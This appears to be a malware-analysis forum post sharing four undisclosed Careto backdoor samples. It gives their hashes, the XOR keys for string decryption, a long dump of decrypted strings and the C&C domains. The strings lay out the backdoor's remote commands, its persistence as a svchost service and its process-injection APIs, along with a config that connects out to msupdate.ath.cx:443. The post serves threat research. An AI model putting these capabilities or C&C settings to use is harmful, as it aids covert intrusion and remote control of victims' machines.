Hi folks,
attached are 4 samples of a malware of the Careto toolset which weren't publicly disclosed, yet. The samples were all uploaded from Cuba and one sample has a C&C server pointing to a former Ministry of Foreign Affairs domain.
Strings in the .data section are encrypted with an algorithm that first checks if a byte is even or uneven and then uses the according key to xor it. Encrypted strings are marked with 0xFF or 0xFE.
Keys:
Code: Select all972414ffa0f0cf302a6702a83382393a2feb509f2abf4c592021bd3161947270:
key_even = 0x11
key_uneven = 0x16
1f30af4c880b12285fc3f7c00457730292c309bf4ba630a3d3d306205b8fea0b:
key_even = 0x19
key_uneven = 0x11
c3b3a5eac3439563693f29eac8b1ba17ecd2bbf5f42473b005072ecd27cfa801:
key_even = 0x12
key_uneven = 0x18
dd22e6ecdb484c42aecee6b90cddce9ee2ceef389555009bf25ee24b18f896af:
key_even = 0x15
key_uneven = 0x11
Example of decrypted strings (972414ffa0f0cf302a6702a83382393a2feb509f2abf4c592021bd3161947270):
Code: Select allyou must specify a secret key to encrypt
no host to connect to (-h for help)
you must specify a port to listen (-p option) or to connect
ports parameter with errors, remember ports must be within 1-65535
%c: option not supported
proxy settings-> %s
-c can only be "on" or "off"
proxy port must be within 1-65535
error 0x%02x to extract arguments
impossible open connection thread
%cL%s -F "%s"
script
D:o:O:1:s:lp:i:r:c:k:Xx:n:
svchost.exe %s
sleeping for %u seconds until reconnecting
authentication failed (aes-cbc-128)
EXT(0x%04x)> %s: disconnected
idcommand 0x%04x
status
-v
EXT(0x%04x)> %s: connected
EXT(0x%04x)> %s
command with error, missing or bad parameters
memory problems to alloc status or params string
set
ERR
OK
%s>>%s
%s
echo**
pipeExtAppOut
%s%s_%04x
\\.\pipe\
pipeExtAppIn
* 0x%04x - %s - %d
socks server error
socks server active - listening socks server in port %d
socks server active - connect to remote sites
no sockets pointer
bad socks request, version: %x, command: %x
first socks packet - no request
socks server closed
impossible start socks server
socks server mode already active
command no valid
end
extapp
extapp_echo
help
path
uninstall
install
displaysvc_names
socks
socksclose
copy
load
delete
close
tunnel
tunnelclose
scriptresume
scriptclose
jscmd
jscript
cmd
exec
execclose
connect
restart
problem to alloc memory to parse command
command too long or exists a problem to parse it
plugin found but it is not saved to disk
plugin not found
->id: %x, ip: %s
-p
file in memory (%s) not found
main connection already active
%c%cscript -i -j -F jscmd
tunnel connection close with error %d
main connection close with error %d
warning, both sites with different versions
Commands:
-close <conn_id>: close session
(in tunnel mode must specify conn_id)
-cmd: same like "exec -M cmd.exe"
-connect <options>: establish a main connection
-copy <local_file> <remote_file>: copy file
-delete <file_id>: delete file from memory
-displaysvc_names: display possible service names to install
-end <conn_id>: end program (in tunnel mode must specify conn_id)
-exec <-Dd> <-w dir> <-t trojan> <-TSI> <-Ff> <-M>
<-u usr@dom> <-p pass> <-c> program args:
execute program
-Dd: daemonize, d: without connection
-w: working directory
-t: trojan to use
-T: use default trojan
-S: use SVCHOST.EXE as trojan
-I: use Internet Browser default as trojan
-M: (obsolete) execute in memory, same as -T
-F: file is in local memory or disk
-f: file is in remote disk
-c: apply name filter
-execclose <exec_id>: close exec session
-help: this text
-install: <-a|s|u> <-n name> <-f file> <-c commandline> <-t title>
<-d description> <-R>:
install like appl, service or user application
-a: install as application service
-s: install as svchost service
-u: install as user application in Registry
-n name: install as this service name
or user app name. Default conf.
-f file: install as this file. Default conf.
-c commandline: install with this service commandline
or app commandline. Default conf.
-t title: install with this service title. Default conf.
-d desc: install with this service description. Default conf.
-R: run service or application after install
-jscript: same like "exec cscript.exe //E:JSCRIPT //Nologo"
-load <-p> <file to load>: load file in memory or <-p> for plugin load
-path <-v>: response with remote ip address in path (-v verbose)
-restart: restart application
-script <-j|v> <-F|f> script|script_file: run script in memory
-j|v: JScript or VBScript. Default propietary scripts.
-F: run script from local memory module or disk file.
-f: run script from remote file.
-scriptclose <script_id>: close script session
-scriptresume <script_id>: resume script session
-set <param_name> <param_value>: set param configuration
-socks <port>: open socks server in specified port
-socksclose: close socks server
-status <-v>: display program status (-v verbose)
-tunnel <options>: establish tunnel with options specified
-tunnelclose: stop waiting status in tunnel connection
-uninstall <-a|s|u> <-n name> <-f file>: uninstall application
tunnel mode already active
command no valid, connection inactive
lss.exe
DisableCMB
DisableCMD
cmd.exe
delete file %s from memory
*%s* 0x%04x - %s
%15d bytes (%s)
sending
receiving
SENT
LOADED
CLOSED WITH ERROR
InternalName
file (%s) impossible to open
no file connection pointer (%s)
loading file %s to memory
copy file %s successfully
end copy file %s with error %d
%s file without data
impossible to open local file (%s)
receiving file %s to disk
impossible open destination file (%s)
destination file (%s) exist
file in memory (%s) already loaded
SCRM
socket library must support 1.1 or higher
OpenWinSocket() error %d
server socket error
connected, waiting initialization packects...
listening on port %u
bad source ip address, using any valid
resolving "%s"...
https=
http=
CONNECT
connecting through proxy...
127.0.0.1:62341
Dnscache
connecting through proxy ESTABLISHED
impossible connect with proxy
client connect error
connecting to %s:%u
Proxy-Connection:
SCR(0x%04x)> CLOSE
*0x%04x - %.20s - (%s) %s
SCR
JScript
VBScript
RUNNING
WAITING EVAL ENGINE
WAITING LAST COMMAND
%s
embedded_JS_%04x
embedded_VBS_%04x
must include command line or filename
Interactive scripts must have connection active
embedded_SCR_%04x
Propietary scripts can not be interactive
Ffjvi
script thread error
remoteIO
SCR(0x%04x)> START %s
SCR(0x%04x)> ERROR: command user abort
SCR(0x%04x)> WAITING: %.20s ...
version
lastretcode
connOK
TRUE
SCR(0x%04x)> ERROR: %s, command no valid
SCR(0x%04x)> ERROR: ifgoto syntax error
SCR(0x%04x)> CONDITIONAL GOTO= FALSE -> continue...
SCR(0x%04x)> ERROR: goto line not found
SCR(0x%04x)> CONDITIONAL GOTO= TRUE -> %.10s ...
ifgoto
SCR(0x%04x)> PAUSE %d seconds
sleep
SCR(0x%04x)> ERROR: error 0x%02x to extract arguments
SCR(0x%04x)> COMMAND: %s
SCR(0x%04x)> FINISHED
script 0x%04x close with error (%d)
waiting to receive file (%s) to run
Interactive script can't communicate with pipes
pipeScriptOut
Pipes not generated
pipeScriptIn
[%s] - (0x%04x) %s@%s - %s
SessionReadShellThreadFn exitted
SCR(0x%04x)> RESUME
SCR(0x%04x)> RESUME last task retcode %d
script open error
there aren`t more space to another script
key
-h?h
0
log
only_one_instance
run_mode
daemonize
-1 can only be "on" or "off"
-D can only be "on" or "off"
force
startdate
WaitForMultipleObjects error
script_start
impossible start process messages thread
commandline
$Linstall %s
install_on_startup
only one instance
shell.{7F9B7834-FDE2-11DD-9EE5-1A4656D89593}
service_name
impossible change file time
service option strings not found
#@2x#@11@#x2@#
mark_ini
error to open dll file to change options
error to alloc memory
"service_file" specified has bad extension
must enter service name in svchost\netsvcs
.DLL
.EXE
service_commandline
service_title
service_desc
service_file
install parameters with errors
sauRn:f:d:t:c:
impossible install service
impossible copy %s to %s
file already exists, change file name
installation successful as user autorun %s -> %s
RegOpenKeyEx()
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
uninstallation successful
file %s not found
SYSTEM\CurrentControlSet\Services\
Services available, not installed:
RegQueryValueEx()
netsvcs
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
config service %s ok
RegSetValueEx(ServiceDll)
ServiceDll
RegCreateKey(Parameters)
Parameters
RegSetValueEx(DisplayName)
DisplayName
RegSetValueEx(Description)
Description
CreateService(%s) SUCCESS
CreateService error
OpenSCManager()
%SystemRoot%\System32\svchost.exe -k netsvcs
StartService()
OpenService()
failed to execute shell
Exception catched 0x%X
DeleteService(%s) SUCCESS
DeleteService()
SCR(0x%04x)> return error: %s (line %d)
SCR(0x%04x)> return: Unhandled VARIANT type %d
SCR(0x%04x)> return: %d (0x%08x)
SCR(0x%04x)> return: %S
%s_%04x
jscmd
*%-30s %s
-startup
-encrypt
-random file name
-disk
-memory
not enough memory to alloc file in memory
error to encrypt/decrypt file %s
%s plugin load successfully
load plugin write file error (%d)
%s%s
sending authentication...
waiting authentication...
recv socket error %d
enabled
versionNumber
displayName
** Without Firewall
Windows Firewall ON
SELECT * FROM FirewallProduct
No updated
Updated
productUptoDate
onAccessScanningEnabled
** Without Antivirus
SELECT * FROM AntivirusProduct
failed to create exec thread
INITIALIZING
WAITING TO START
CLOSED
*%c* 0x%04x - %s %s
%s
http\shell\open\command
default
internet_browser
filter option only in execution from local disk
must specify password
//E:JSCRIPT //Nologo
cscript.exe
trojan_default_gui
+Ddu:p:t:TSIMmFfcw:
error to alloc MUI file
load in memory failed. Consider making real EXE relocatable
%TEMP%
failed to create exe file temp
failed to rename file before executing
file filtered in %s
filter not found any patterns
%s\tmp_%s
svchost.exe
applying NAME_REPLACE filter to %s
no exec connection pointer
end process "%s" with id 0x%04x at %s with error %d
end process "%s" with id 0x%04x at %s, return code: 0x%x
start process "%s" with id 0x%04x at %s
failed to alloc memory buffer to read from pipes
failed to create shell stdin pipe
failed to create shell stdout pipe
failed to fork process
failed to reload SYSTEM user profile
domain or server name does not exists
failed to create user environment block
failed to load user profile
pointer functions not found, not supported in this platform
LCIDToLocaleName
VirtualProtectEx
VirtualQueryEx
VirtualAllocEx
WriteProcessMemory
ReadProcessMemory
ResumeThread
GetThreadContext
SetThreadContext
ZwUnmapViewOfSection
NetWkstaGetInfo
NetApiBufferFree
ExpandEnvironmentStringsForUserA
UnloadUserProfile
LoadUserProfileA
DestroyEnvironmentBlock
CreateEnvironmentBlock
RevertToSelf
ImpersonateLoggedOnUser
CreateProcessWithLogonW
LogonUserA
CreateProcessAsUserA
program and trojan are imcompatible for forking process (different machine types)
program and trojan are imcompatible for forking process (different subsystem)
trojan_default_cui
program (%s) to execute with bad subsystem
"%s" file with PE bad format
forking process "%s" with "%s"
bad read sections
file (%s) to execute impossible to open
no interactive input/output created
pipeOut
%s%s%04x
pipeIn
%s *%04x
impossible find remoteIO plugin
bad message error (code %d)
timeout message error
insert message error
format message error
mark_ini
#@2x#@11@#x2@#
daemonize
1
commandline
-D on -X -c on -k support@microsoft.com -r 3142 msupdate.ath.cx 443
log
log_encrypt
0
run_mode
N
key
reversednslookup
install_on_startup
only_one_instance
0
cmd
cmd.exe
startdate
service_name
iprip
service_file
iprip.dll
service_desc
Internet Protocol Routing Information Protocol
service_commandline
-D on -c on -k support@microsoft.com -r 3142 msupdate.ath.cx 443
service_title
Internet Protocol Routing Information Protocol
trojan_default_gui
svchost.exe
trojan_default_cui
wevtutil.exe
internet_browser
default
script_start
#Lconnect -c on -k support@microsoft.com -r 3142 -n 1 msupdate.ath.cx 443
$Sifgoto connOK connectionOK
#Lconnect -X -c on -k support@microsoft.com -r 3142 -n 3 msupdate.ath.cx 443
$Sifgoto connOK connectionOK
$Sifgoto TRUE end
connectionOK:
end:
impossible start output display strings thread, pass to daemonize mode
impossible start user input commands thread, pass to daemonize mode
OPEN NEW SESSION %02d/%02d/%04d - %02d:%02d:%02d **********
open log file error
end program, press any key to continue...
keyboard error
msscript.ocx
Tools found:
Current directory:
Module name:
User name:
Computer name:
(x32)
(x64)
Plugins:
Scripts:
Exec sessions:
Socks server sessions:
Socks server status:
File sessions:
connecting
active
inactive
Tunnel connection (%s), socket info:
remote %s(%s):%d - ID:0x%04x
local %s(%s):%d - ID:0x%04x
Main connection (%s), socket info:
CONNECTING
WAITING
CONNECTED
ACTIVE
INACTIVE
Remote SCR site (id:0x%04x): %s(%s) (id: 0x%04x)
%s %s ** id: 0x%04x
**** SCR
unknown system code error
Usage:
connect (tcp): scr [-options] host port
listen (tcp): scr -l -p port [-options]
options:
-l listen for incoming connection
-p choose port to listen on, or source port to connect out from
-i <ip> local ip address to listen
-x ip:port in cliente mode with proxy, <proxy address:proxy port>
-X in cliente mode with autodetect proxy
-s script script to run at startup
-r n infinitely respawn/reconnect, pause for n seconds between
connection attempts. -r 0 can be used to re-listen after
disconnect (just like a regular daemon)
-n n respawn tries
-c on|off encryption on/off. specify whether you want to use the
built-in AES-CBC-128 + HMAC-SHA1 encryption implementation.
-k secret override default phrase to use for encryption (secret must be
shared between client and server)
-o|O logfile write all display message to log file, -O encryopt lg
-D on|off detach from console (FreeConsole()) (on=yes or off=no).
EXT
none>
%s@%s(%s)>
\\\out-%.04x>
\\\in-%.04x>
\\\s-out-%.04x>
\\\s-in-%.04x>
C&C server:
Code: Select allmsupdate.ath.cx
karpeskmon.dyndns.org
isaserver.minrex.gov.cu
Samples:
https://www.virustotal.com/en/file/9724 ... /analysis/
https://www.virustotal.com/en/file/1f30 ... /analysis/
https://www.virustotal.com/en/file/c3b3 ... /analysis/
https://www.virustotal.com/en/file/dd22 ... /analysis/
